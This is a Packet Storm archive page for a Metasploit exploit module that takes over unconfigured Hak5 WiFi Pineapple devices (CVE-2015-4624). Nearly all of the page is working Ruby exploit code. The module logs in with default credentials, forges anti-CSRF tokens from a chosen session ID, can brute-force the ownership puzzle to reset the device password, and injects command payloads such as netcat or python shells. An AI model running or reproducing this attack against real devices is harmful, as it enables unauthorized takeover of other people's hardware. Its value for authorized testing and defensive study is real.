what you don't know can hurt you

Hak5 WiFi Pineapple Preconfiguration Command Injection 2

Hak5 WiFi Pineapple Preconfiguration Command Injection 2
Posted Oct 19, 2016
Authored by catatonicprime | Site metasploit.com

This Metasploit module exploits a command injection vulnerability on WiFi Pineapples versions 2.0 and below and pineapple versions prior to 2.4. We use a combination of default credentials with a weakness in the anti-csrf generation to achieve command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail, you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a known password if successful and may interrupt the user experience. These devices may typically be identified by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting worm.

tags | exploit, worm
advisories | CVE-2015-4624
MD5 | 6decdeddc87bc1b4e2eab5e2ce78b412

Hak5 WiFi Pineapple Preconfiguration Command Injection 2

Change Mirror Download
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
We use a combination of default credentials with a weakness in the anti-csrf generation to achieve
command injection on fresh pineapple devices prior to configuration. Additionally if default credentials fail,
you can enable a brute force solver for the proof-of-ownership challenge. This will reset the password to a
known password if successful and may interrupt the user experience. These devices may typically be identified
by their SSID beacons of 'Pineapple5_....'; details derived from the TospoVirus, a WiFi Pineapple infecting
worm.
},
'Author' => ['catatonicprime'],
'License' => MSF_LICENSE,
'References' => [[ 'CVE', '2015-4624' ]],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'Space' => 2048,
'DisableNops' => true,
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python netcat telnet'
}
},
'Targets' => [[ 'WiFi Pineapple 2.0.0 - 2.3.0', {}]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 1 2015'
))

register_options(
[
OptString.new('USERNAME', [ true, 'The username to use for login', 'root' ]),
OptString.new('PASSWORD', [ true, 'The password to use for login', 'pineapplesareyummy' ]),
OptString.new('PHPSESSID', [ true, 'PHPSESSID to use for attack', 'tospovirus' ]),
OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
Opt::RPORT(1471),
Opt::RHOST('172.16.42.1')
]
)
register_advanced_options(
[
OptBool.new('BruteForce', [ false, 'When true, attempts to solve LED puzzle after login failure', false ]),
OptInt.new('BruteForceTries', [ false, 'Number of tries to solve LED puzzle, 0 -> infinite', 0 ])
]
)

deregister_options(
'ContextInformationFile',
'DOMAIN',
'DigestAuthIIS',
'EnableContextEncoding',
'FingerprintCheck',
'HttpClientTimeout',
'NTLM::SendLM',
'NTLM::SendNTLM',
'NTLM::SendSPN',
'NTLM::UseLMKey',
'NTLM::UseNTLM2_session',
'NTLM::UseNTLMv2',
'SSL',
'SSLVersion',
'VERBOSE',
'WORKSPACE',
'WfsDelay',
'Proxies',
'VHOST'
)
end

def login_uri
normalize_uri('includes', 'api', 'login.php')
end

def brute_uri
normalize_uri("/?action=verify_pineapple")
end

def set_password_uri
normalize_uri("/?action=set_password")
end

def phpsessid
datastore['PHPSESSID']
end

def username
datastore['USERNAME']
end

def password
datastore['PASSWORD']
end

def cookie
"PHPSESSID=#{phpsessid}"
end

def csrf_token
Digest::SHA1.hexdigest datastore['PHPSESSID']
end

def use_brute
datastore['BruteForce']
end

def use_brute_tries
datastore['BruteForceTries']
end

def login
# Create a request to login with the specified credentials.
res = send_request_cgi(
'method' => 'POST',
'uri' => login_uri,
'vars_post' => {
'username' => username,
'password' => password,
'login' => "" # Merely indicates to the pineapple that we'd like to login.
},
'headers' => {
'Cookie' => cookie
}
)

return nil unless res

# Successful logins in preconfig pineapples include a 302 to redirect you to the "please config this device" pages
return res if res.code == 302 && (res.body !~ /invalid username/)

# Already logged in message in preconfig pineapples are 200 and "Invalid CSRF" - which also indicates a success
return res if res.code == 200 && (res.body =~ /Invalid CSRF/)

nil
end

def cmd_inject(cmd)
res = send_request_cgi(
'method' => 'POST',
'uri' => target_uri.path,
'cookie' => cookie,
'vars_get' => {
'execute' => "" # Presence triggers command execution
},
'vars_post' => {
'_csrfToken' => csrf_token,
'commands' => cmd
}
)

res
end

def brute_force
print_status('Beginning brute forcing...')
# Attempt to get a new session cookie with an LED puzzle tied to it.
res = send_request_cgi(
'method' => 'GET',
'uri' => brute_uri
)

# Confirm the response indicates there is a puzzle to be solved.
if !res || !(res.code == 200) || res.body !~ /own this pineapple/
print_status('Brute forcing not available...')
return nil
end

cookies = res.get_cookies
counter = 0
while use_brute_tries.zero? || counter < use_brute_tries
print_status("Try #{counter}...") if (counter % 5).zero?
counter += 1
res = send_request_cgi(
'method' => 'POST',
'uri' => brute_uri,
'cookie' => cookies,
'vars_post' => {
'green' => 'on',
'amber' => 'on',
'blue' => 'on',
'red' => 'on',
'verify_pineapple' => 'Continue'
}
)

if res && res.code == 200 && res.body =~ /set_password/
print_status('Successfully solved puzzle!')
return write_password(cookies)
end
end
print_warning("Failed to brute force puzzle in #{counter} tries...")
nil
end

def write_password(cookies)
print_status("Attempting to set password to: #{password}")
res = send_request_cgi(
'method' => 'POST',
'uri' => set_password_uri,
'cookie' => cookies,
'vars_post' => {
'password' => password,
'password2' => password,
'eula' => 1,
'sw_license' => 1,
'set_password' => 'Set Password'
}
)
if res && res.code == 200 && res.body =~ /success/
print_status('Successfully set password!')
return res
end
print_warning('Failed to set password')

nil
end

def check
loggedin = login
unless loggedin
brutecheck = send_request_cgi(
'method' => 'GET',
'uri' => brute_uri
)
return Exploit::CheckCode::Safe if !brutecheck || !brutecheck.code == 200 || brutecheck.body !~ /own this pineapple/
return Exploit::CheckCode::Vulnerable
end

cmd_success = cmd_inject("echo")
return Exploit::CheckCode::Vulnerable if cmd_success && cmdSuccess.code == 200 && cmd_success.body =~ /Executing/

Exploit::CheckCode::Safe
end

def exploit
print_status('Logging in with credentials...')
loggedin = login
if !loggedin && use_brute
brute_force
loggedin = login
end
unless loggedin
fail_with(Failure::NoAccess, "Failed to login PHPSESSID #{phpsessid} with #{username}:#{password}")
end

print_status('Executing payload...')
cmd_inject("#{payload.encoded}")
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close